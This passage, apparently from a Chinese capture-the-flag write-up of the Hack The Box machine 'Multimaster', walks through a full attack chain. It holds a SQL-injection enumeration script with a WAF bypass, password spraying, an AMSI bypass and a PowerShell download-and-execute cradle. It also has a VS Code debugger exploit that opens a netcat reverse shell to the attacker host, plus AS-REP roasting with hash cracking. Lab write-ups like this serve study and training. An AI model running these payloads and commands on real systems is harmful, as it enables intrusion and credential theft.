payload_template = """-3202' UNION ALL SELECT 86,86,86,{},CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes"""
def unicode_escape(s):
return "".join([r"\u{:04x}".format(ord(c)) for c in s])
def issue_query(sql):
while True:
resp = requests.post(
"http://10.10.10.179/api/getColleagues",
data='{"name":"' + unicode_escape(payload_template.format(sql)) + '"}',
headers={"Content-type": "text/json; charset=utf-8"},
#因为担心WAF会有CC防护,走burp代理会减缓很多。
proxies={"http": "http://127.0.0.1:8080"},
)
# 大佬的心思还是慎密
# 当被WAF拦截时会返回403状态码,紧跟着会 返回很多403状态码,所以触发WAF拦截后稍等一会让再接着跑
if resp.status_code != 403:
break
sys.stdout.write("\r[-] 被WAF拦截,将在60秒继续枚举")
time.sleep(60)
return resp.json()[0]["email"]
domain = issue_query("DEFAULT_DOMAIN()")
sid = issue_query(f"master.dbo.fn_varbintohexstr(SUSER_SID('{domain}\Domain Admins'))")[:-8]
print(f"[+] Found SID for {domain} domain: {sid}")
# 我只需要从RID 3115开始枚举
for i in range(3115, 10500):
sys.stdout.write(f"\r[*] Checking SID {i}" + " " * 50)
num = binascii.hexlify(struct.pack(", i)).decode()
acct = issue_query(f"SUSER_SNAME({sid}{num})")
if acct:
print(f"\r[+] Found account [{i:05d}] {acct}" + " " * 30)
time.sleep(1)
print("\r" + " " * 30) 在3115后还会有几个账户:
[+] Found account [03116] MEGACORP\jsmmons
[+] Found account [03117] MEGACORP\pmartin
[+] Found account [03119] MEGACORP\Developers 但是它们还是不可以:
$ crackmapexec smb 10.10.10.179 -u ./users.txt -p passwd.txt --continue-on-success
SMB 10.10.10.179 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:password1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:finance1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:banking1 STATUS_LOGON_FAILURE 我大概知道这台机的榜一为什么能做那么久了,1000以内的RID可以排除,因为那是系统预留的,那我还是需要从1001开始枚举:
[+] Found account [01110] MEGACORP\tushikikatomo
[+] Found account [01111] MEGACORP\andrew
[+] Found account [01112] MEGACORP\lana
[*] Checking SID 1134我可以去尝试一下:
$ crackmapexec smb 10.10.10.179 -u user.txt -p passwd.txt --continue-on-success
SMB 10.10.10.179 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\lana:password1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\lana:finance1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\lana:banking1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\andrew:password1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\andrew:finance1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\andrew:banking1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\tushikikatomo:password1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [+] MEGACORP.LOCAL\tushikikatomo:finance1
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\tushikikatomo:banking1 STATUS_LOGON_FAILURE 终于有一个口令对了。smb可以访问到一个共享:
$ smbmap -H 10.10.10.179 -u tushikikatomo -p finance1
[+] IP: 10.10.10.179:445 Name: multimaster.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Development NO ACCESS
dfs READ ONLY
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share但是我访问的时候出现了问题:
$ smbclient //10.10.10.179/dfs -U tushikikatomo
Enter WORKGROUP\tushikikatomo's password:
do_connect: Connection to FSMO.MEGACORP.LOCAL failed (Error NT_STATUS_UNSUCCESSFUL)以tushikikatomo身份登录目标:
可以正常登录,但是我登录后的用户文件夹是alcibiades:
$ evil-winrm -i 10.10.10.179 -u "MEGACORP\tushikikatomo" -p finance1
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alcibiades\Documents>而且我有user.txt:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> dir
Directory: C:\Users\alcibiades\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2022 6:35 PM 34 user.txt
*Evil-WinRM* PS C:\Users\alcibiades\desktop> type user.txt域侦测:
我不知道这个用户在公司充当着什么角色,因为我之前SQLMAP为我枚举出来的员工信息中没有该用户,当下我对目标内部环境还是一无所知。我可以关闭4MSI反恶意软件扫描:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\Users\alcibiades\desktop> 那么我可以试着通过winPEAS帮我枚举一些信息:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\alcibiades\desktop> ls
Directory: C:\Users\alcibiades\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2022 6:35 PM 34 user.txt
-a---- 4/25/2022 2:05 AM 1936384 winPEASx86.exe但是我启动不了,没有任何报错信息,它也没被删掉:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> .\winPEASx86.exe
*Evil-WinRM* PS C:\Users\alcibiades\desktop> ls
Directory: C:\Users\alcibiades\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2022 6:35 PM 34 user.txt
-a---- 4/25/2022 2:05 AM 1936384 winPEASx86.exe或许目标还存在某种限制。但是SharpHound可以正常运行:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> wget http://10.10.16.7/SharpHound.exe -O SharpHound.exe
*Evil-WinRM* PS C:\Users\alcibiades\desktop> .\SharpHound.exe
2022-04-25T02:10:35.2819957-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-25T02:10:35.2976232-07:00|INFORMATION|Initializing SharpHound at 2:10 AM on 4/25/2022
2022-04-25T02:10:35.5530386-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-25T02:10:35.8131731-07:00|INFORMATION|Beginning LDAP search for MEGACORP.LOCAL
2022-04-25T02:10:35.8906235-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-04-25T02:10:35.8906235-07:00|INFORMATION|LDAP channel closed, waiting for consumersEvil-WinRM内置的下载模块下载了个寂寞:
*Evil-WinRM* PS C:\Users\alcibiades\desktop> download 20220425021122_BloodHound.zip
Info: Downloading 20220425021122_BloodHound.zip to ./20220425021122_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\alcibiades\desktop> 我还是通过smb共享传送回来吧:
$ ./smbserver.py share /home/worldisend -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\alcibiades\Desktop> net use \\10.10.16.7\share /u:whoami whoami
The command completed successfully.
*Evil-WinRM* PS C:\Users\alcibiades\Desktop> copy 20220425021122_BloodHound.zip \\10.10.16.7\shareBloodhound没有枚举出标准的用户名,但是没关系,我可以通过SID定位自己:
Evil-WinRM* PS C:\Users\alcibiades\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
====================== =============================================
megacorp\tushikikatomo S-1-5-21-3167813660-1240564177-918740779-1110我当前用户信息少的可怜,它仅仅是远程管理组,仅此而已:
Bloodhound没有什么能为我提供的。我可以看一眼进程:
*Evil-WinRM* PS C:\Users\alcibiades\Desktop> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
276 51 58640 20244 1748 1 Code
407 54 96440 135816 1852 1 Code
413 22 15416 8400 2468 1 Code
403 53 95936 46780 2908 1 Code
277 51 57616 57308 3588 1 Code
658 48 33060 70340 3800 1 Code
318 32 39612 25924 4172 1 Code
278 51 57452 74480 4264 1 Code
404 54 94948 110128 5160 1 Code
214 15 6116 4164 6840 1 Code
368 14 1936 4320 368 0 csrss
244 16 1932 4144 484 1 csrss
359 32 14168 22844 2508 0 dfsrs
171 13 2440 7720 2708 0 dfssvc
104 7 1288 5788 1880 0 dllhost
211 13 3612 12400 3088 0 dllhost
10320 7413 129764 126640 2476 0 dns
324 22 24576 52484 924 1 dwm
1126 48 17404 65860 4460 1 explorer
0 0 0 4 0 0 Idle
112 12 1712 5384 2460 0 ismserv
1934 234 53308 66860 612 0 lsass它有很多Code,我不知道是做什么的,它们在一些高端口上运行着:
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2476
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 3476
TCP 127.0.0.1:49295 0.0.0.0:0 LISTENING 3136
TCP 127.0.0.1:60158 0.0.0.0:0 LISTENING 4808
*Evil-WinRM* PS C:\Users> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
650 52 33220 78652 1836 1 Code
214 15 6104 4164 2376 1 Code
277 51 58800 69596 3136 1 Code
276 52 45264 20064 4808 1 Code
318 32 40420 29076 4936 1 Code
406 53 95196 51104 5088 1 Code
404 55 96676 125068 5476 1 Code
356 57 134040 170036 5488 1 Code
413 22 16396 9604 6836 1 Code
278 51 57972 75156 6892 1 Code
我不知道它是什么程序,有个web目录我无权遍历:
*Evil-WinRM* PS C:\inetpub> cd wwwroot
*Evil-WinRM* PS C:\inetpub\wwwroot> ls
Access to the path 'C:\inetpub\wwwroot' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\wwwroot:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\inetpub\wwwroot> 我觉得code进程会是我突破的关键,但是我不知道它具体能被用来做什么。我大概知道为什么我的winPEAS为什么启动不了了,它大概被Windows Defender阻止了:
*Evil-WinRM* PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/16/2016 6:23 AM Common Files
d----- 1/9/2020 2:39 PM Internet Explorer
da---- 1/9/2020 1:17 PM Microsoft SQL Server
d----- 1/7/2020 7:26 PM Microsoft Visual Studio 10.0
d----- 1/7/2020 7:27 PM Microsoft.NET
d----- 1/7/2020 9:43 PM Reference Assemblies
d----- 1/9/2020 2:39 PM Windows Defender
d----- 1/9/2020 2:39 PM Windows Mail
d----- 1/9/2020 2:39 PM Windows Media Player
d----- 7/16/2016 6:23 AM Windows Multimedia Platform
d----- 7/16/2016 6:23 AM Windows NT
d----- 1/9/2020 2:39 PM Windows Photo Viewer
d----- 7/16/2016 6:23 AM Windows Portable Devices
d----- 7/16/2016 6:23 AM WindowsPowerShel获取cyork用户的shell:
在目标机器的标签中有几个CVE,其中有一个 CVE-2019-1414与Visual Studio code有关,看起来这是作者为我留下的一条路。顺着这条线索,我找到这个博客:
https://iwantmore.pizza/posts/cve-2019-1414.html
或许我可以通过该漏洞获取到另一个用户的shell,该漏洞利用其实很简单,脚本在我刚发的连接就有,但是需要更改:
}))
console.log(`[!] Executing: ${COMMAND}`)
socket.send(JSON.stringify({
id: 3,
method: 'Runtime.evaluate',
params: {
expression: `spawnSync('/bin/bash', ['-c', 'echo ${COMMAND_B64} | base64 -d | /bin/bash'])`
}
}))这是原脚本中的代码,它是linux的,而我的目标是windows的。我需要将其改掉,因为我有一个shell,我可以将nc传送到目标,nc的位置也有讲究,如果进程所属的用户不是管理员或系统权限用户,它可能没有权限访问nc所在的目录,所以我需要找一个应该很多用户都能访问的目录:
socket.send(JSON.stringify({
id: 3,
method: 'Runtime.evaluate',
params: {
expression: `spawnSync('/programdata/nc.exe', ['-e', 'cmd.exe', '10.10.16.7', '233'])`
}使用很简单,但是它只能本地利用,我需要通过代理转发到我本地端口:
*Evil-WinRM* PS C:\ProgramData> powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/shell.ps1'))"
powershell.exe : IEX : At line:1 char:1
+ CategoryInfo : NotSpecified: (IEX : At line:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ function oNfp {
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/she ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Invok
eExpressionCommand
*Evil-WinRM* PS C:\ProgramData> 但是我执行powershell载荷上线时可以看到被杀软拦截,即使我已经MSI:
This script contains malicious content and has been blocked by your antivirus software.
此脚本包含恶意内容,已被杀毒软件阻止。 而且生成exe程序,我不知道为什么,我对载荷做了免杀处理,但是它运行不了:
*Evil-WinRM* PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/16/2016 6:23 AM Comms
d---s- 1/9/2020 1:18 PM Microsoft
d----- 7/19/2021 1:07 AM Package Cache
d----- 9/25/2019 10:54 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:23 AM SoftwareDistribution
d----- 11/20/2016 5:15 PM USOPrivate
d----- 11/20/2016 5:15 PM USOShared
da---- 7/19/2021 1:07 AM VMware
d----- 1/7/2020 7:45 PM VsTelemetry
-a---- 4/25/2022 5:23 AM 73802 hello.exe
-a---- 4/25/2022 5:07 AM 38616 nc.exe
*Evil-WinRM* PS C:\ProgramData> .\hello.exe
*Evil-WinRM* PS C:\ProgramData> ls
*Evil-WinRM* PS C:\ProgramData> cmd /c "C:\ProgramData\hello.exe"
*Evil-WinRM* PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/16/2016 6:23 AM Comms
d---s- 1/9/2020 1:18 PM Microsoft
d----- 7/19/2021 1:07 AM Package Cache
d----- 9/25/2019 10:54 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:23 AM SoftwareDistribution
d----- 11/20/2016 5:15 PM USOPrivate
d----- 11/20/2016 5:15 PM USOShared
da---- 7/19/2021 1:07 AM VMware
d----- 1/7/2020 7:45 PM VsTelemetry
-a---- 4/25/2022 5:23 AM 73802 hello.exe
-a---- 4/25/2022 5:07 AM 38616 nc.exe也无任何报错信息提示。也没杀软杀掉,但它就是不回连:
[*] Started reverse TCP handler on 10.10.16.7:4444
后来我找到了这样一款工具:
https://github.com/taviso/cefdebug/releases/tag/v0.2它不需要我做代理,可以直接本地利用,虽然我不确保它能否在目标上正常执行,但是我觉得可以试试,
*Evil-WinRM* PS C:\ProgramData> wget http://10.10.16.7/cefdebug.exe -O cefdebug.exe
*Evil-WinRM* PS C:\ProgramData> .\cefdebug.exe
cefdebug.exe : [2022/04/25 05:41:43:5632] U: There are 4 tcp sockets in state listen.
+ CategoryInfo : NotSpecified: ([2022/04/25 05:...n state listen.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
[2022/04/25 05:42:03:5761] U: There were 2 servers that appear to be CEF debuggers.
[2022/04/25 05:42:03:5771] U: ws://127.0.0.1:17448/3ac5a069-f80b-47c7-a02f-28dea9f4e7a6
[2022/04/25 05:42:03:5771] U: ws://127.0.0.1:61620/a6b422fa-889d-4e8e-8f33-c003470e0a5a当我启动时,它会监听一些存活的套接字,我可以探测对应端口运行的进程版本:
*Evil-WinRM* PS C:\ProgramData> .\cefdebug.exe --code "process.version" --url ws://127.0.0.1:61620/a6b422fa-889d-4e8e-8f33-c003470e0a5a
cefdebug.exe : [2022/04/25 05:43:15:7007] U: >>> process.version
+ CategoryInfo : NotSpecified: ([2022/04/25 05:...process.version:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
[2022/04/25 05:43:15:7007] U: <<< v10.11.0因为我已经获取到了目标一个shell,我可以通过wget将nc传送到目标中去,为了确保能正常运行,需要找一个所有用户应该都具有访问执行权限的目录:
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('C:\\programdata\\nc.exe 10.10.16.7 443 -e cmd')" --url ws://127.0.0.1:29017/998ccfd8-fa96-4940-8066-be85400d7445
[2022/04/25 06:29:50:0929] U: >>> process.mainModule.require('child_process').exec('C:\\programdata\\nc.exe 10.10.16.7 443 -e cmd')
[2022/04/25 06:29:50:0929] U: <<< ChildProcessNcat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.179.
Ncat: Connection from 10.10.10.179:50173.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Program Files\Microsoft VS Code>whoami
megacorp\cyorkcyork用户对于**\inetpub\wwwroot**有访问权限,我在里边发现了这个:
C:\inetpub\wwwroot\bin>dir
Volume in drive C has no label.
Volume Serial Number is 5E12-F84E
Directory of C:\inetpub\wwwroot\bin
01/07/2020 10:28 PM .
01/07/2020 10:28 PM ..
02/21/2013 08:13 PM 102,912 Antlr3.Runtime.dll
02/21/2013 08:13 PM 431,616 Antlr3.Runtime.pdb
05/24/2018 01:08 AM 40,080 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
07/24/2012 11:18 PM 45,416 Microsoft.Web.Infrastructure.dll
01/09/2020 05:13 AM 13,824 MultimasterAPI.dll
01/09/2020 05:13 AM 28,160 MultimasterAPI.pdb
02/17/2018 09:14 PM 664,576 Newtonsoft.Json.dll
01/07/2020 10:28 PM roslyn
11/28/2018 12:30 AM 178,808 System.Net.Http.Formatting.dll
11/28/2018 12:28 AM 27,768 System.Web.Cors.dll
01/27/2015 03:34 PM 139,976 System.Web.Helpers.dll
11/28/2018 12:31 AM 39,352 System.Web.Http.Cors.dll
11/28/2018 12:31 AM 455,096 System.Web.Http.dll
01/31/2018 11:49 PM 77,520 System.Web.Http.WebHost.dll
01/27/2015 03:32 PM 566,472 System.Web.Mvc.dll
02/11/2014 02:56 AM 70,864 System.Web.Optimization.dll
01/27/2015 03:32 PM 272,072 System.Web.Razor.dll
01/27/2015 03:34 PM 41,672 System.Web.WebPages.Deployment.dll
01/27/2015 03:34 PM 211,656 System.Web.WebPages.dll
01/27/2015 03:34 PM 39,624 System.Web.WebPages.Razor.dll
07/17/2013 04:33 AM 1,276,568 WebGrease.dll
20 File(s) 4,724,032 bytes
3 Dir(s) 19,370,094,592 bytes free 我可以通过共享将其传送到我的机器中。在MultimasterAPI.dll这个文件中,我通过dnSpy打开它,在其中包含着另一个口令:
D3veL0pM3nT!我可以通过密码喷涂去尝试它能登录为哪个用户:
$ crackmapexec smb 10.10.10.179 -u ./user.txt -p 'D3veL0pM3nT!' --continue-on-success
SMB 10.10.10.179 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.179 445 MULTIMASTER [+] MEGACORP.LOCAL\sbauer:D3veL0pM3nT
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\okent:D3veL0pM3nT! STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\ckane:D3veL0pM3nT! STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\kpage:D3veL0pM3nT! STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\shayna:D3veL0pM3nT! STATUS_LOGON_FAILURE 我可以尝试登录sbauer。
以sbauer身份登录目标:
$ evil-winrm -u 'MEGACORP\sbauer' -p 'D3veL0pM3nT!' -i 10.10.10.179
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sbauer\Documents>我可以登录。sbauer是一个初级开发人员,或许它的权限会更高一点,我可以先尝试ShareHound,我还是会通过smb共享传回来。一样的没有用户名,但是我可以通过SID定位当前用户:
sbauer用户在远程管理组中,这算句废话,我都登录上来了,它另一个组便是DEVELOPERS(开发人员),这不是Windows默认的组,是被人为创建的。BloodHound不知为何显示不出用户名,它很不利于我分析数据,在DEVELOPERS组中还有一个jorden,或许我可以横向移动到它上去看看:
*Evil-WinRM* PS C:\Users\sbauer\Documents> net groups DEVELOPERS
Group name Developers
Comment
Members
-------------------------------------------------------------------------------
aldom cyork jorden
sbauer
The command completed successfully.
我决定为目标传入一个PowerView:
*Evil-WinRM* PS C:\Users\sbauer\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\sbauer\Documents> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\Users\sbauer\Documents> wget http://10.10.16.7/PowerView.ps1 -O PowerView.ps1
*Evil-WinRM* PS C:\Users\sbauer\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\sbauer\Documents> Active Directory 属性userAccountControl包含一系列标志,这些标志定义了用户对象的一些重要的基本属性。这些标志也可用于请求或更改帐户的状态。如需详细信息,可以看这两篇文章:
http://www.selfadsi.org/ads-attributes/user-userAccountControl.htmhttps://docs.microsoft.com/zh-cn/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties我可以看一眼jorden的userAccountControl标志:
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue
Name Value
---- -----
NORMAL_ACCOUNT 512
DONT_EXPIRE_PASSWORD 65536
*Evil-WinRM* PS C:\Users\sbauer\Documents>它只开启了两个:NORMAL_ACCOUNT-它是表示典型用户的默认帐户类型。DONT_EXPIRE_PASSWORD:密码永不过期。
开启jorden用户的kerberos预认证:
在kerberos协议中,域用户在配置了”Do not require Kerberos preauthentication(不需要kerberos预身份验证) “属性时,则该用户在进行Kerberos身份验证时就不需要进行第一步(AS_REQ & AS_REP)的预身份验证。使用该用户请求票据时,域控不会做任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。因此,攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。
预身份验证的用户需要userAccountControl标志中以下为开启:
DONT_REQUIRE_PREAUTH - (Windows 2000/Windows Server 2003) 此账户不需要 Kerberos 预身份验证来登录。如果我希望当前用户能够成为预身份验证用户那我需要这一位为1:
对于每个用户,都有一个 4 字节字代表userAccountControl各种标志,当下jorden用户的标志是没有开的,但是它开了NORMAL_ACCOUNT:
与DONT_EXPIRE_PASSWORD:
那么jorden当前的userAccountControl标志位应该是:
0000 0000 0000 0001 0000 0010 0000 0000而我需要它的DONT_REQUIRE_PREAUTH位开启,也就是说我希望它的userAccountControl标志位是这样的:
0000 0000 0010 0001 0000 0010 0000 0000那我只需要让:
0000 0000 0000 0001 0000 0010 0000 0000与
0000 0000 0100 0000 0000 0000 0000 0000 就是4194304的二进制形式做一次异或运算就可以。当然我不知道我有没有权限,但是我可以试试:
*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden))))
Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden'
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue
Name Value
---- -----
NORMAL_ACCOUNT 512
DONT_EXPIRE_PASSWORD 65536
DONT_REQ_PREAUTH 4194304
*Evil-WinRM* PS C:\Users\sbauer\Documents>我成功开启了jorden的预身份验证。那么现在,我可以通过jorden用户无需提供任何密码,域控会直接返回用jorden用户NTLM哈希加密的Session Key,我可以直接导出来将其破解:
$ ./GetNPUsers.py -no-pass -dc-ip 10.10.10.179 MEGACORP/jorden
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for jorden
$krb5asrep$23$jorden@MEGACORP:f8a657be8d41001c7d58c0b0324e7706$f5ba49218b6da775bd454fd9c41769b92e0ec063bbe6d983f0946100ce1e3d567352bfe645dd8271658a80028d8c4a618f846988d49a35547da70814c74498539acdb8596ed5b84c6a973a2bf3a343be2776b80f1e5fb9e09f78f25a5249f7ef3d7babb6f7ae4c26e9217fcc3711b195a272afae5b9b8b7b5a2501da7001e4bb173e5079f8888fd52cca31322ab2ac6568d1f97dc6dbe1e83288cb9518e052cf7b778a57ab66fcbd0a737103695d9bd23ecee79bdd8dace4b32651d6b94ff4ef83dabbd3818bcf45b71ccff9b2eb0940bd6025b8e4d04cfd88f59089dcc2fc786d627ce73240038c6e9b我可以通过hashcat去破解:
$ hashcat -h | grep "AS-REP"
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
$ hashcat -m 18200 ../../../hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
$krb5asrep$23$jorden@MEGACORP:f8a657be8d41001c7d58c0b0324e7706$f5ba49218b6da775bd454fd9c41769b92e0ec063bbe6d983f0946100ce1e3d567352bfe645dd8271658a80028d8c4a618f846988d49a35547da70814c74498539acdb8596ed5b84c6a973a2bf3a343be2776b80f1e5fb9e09f78f25a5249f7ef3d7babb6f7ae4c26e9217fcc3711b195a272afae5b9b8b7b5a2501da7001e4bb173e5079f8888fd52cca31322ab2ac6568d1f97dc6dbe1e83288cb9518e052cf7b778a57ab66fcbd0a737103695d9bd23ecee79bdd8dace4b32651d6b94ff4ef83dabbd3818bcf45b71ccff9b2eb0940bd6025b8e4d04cfd88f59089dcc2fc786d627ce73240038c6e9b:rainforest786我获取到了jorden用户的口令rainforest786。
以jorden身份登录目标:
$ evil-winrm -u "MEGACORP\jorden" -p rainforest786 -i 10.10.10.179
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jorden\Documents>我可以看一眼jorden的属性:
*Evil-WinRM* PS C:\Users\jorden\Documents> net user jorden
User name jorden
Full Name Jorden Mclean
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:48:17 PM
Password expires Never
Password changeable 1/10/2020 5:48:17 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/25/2022 8:21:55 AM
Logon hours allowed All
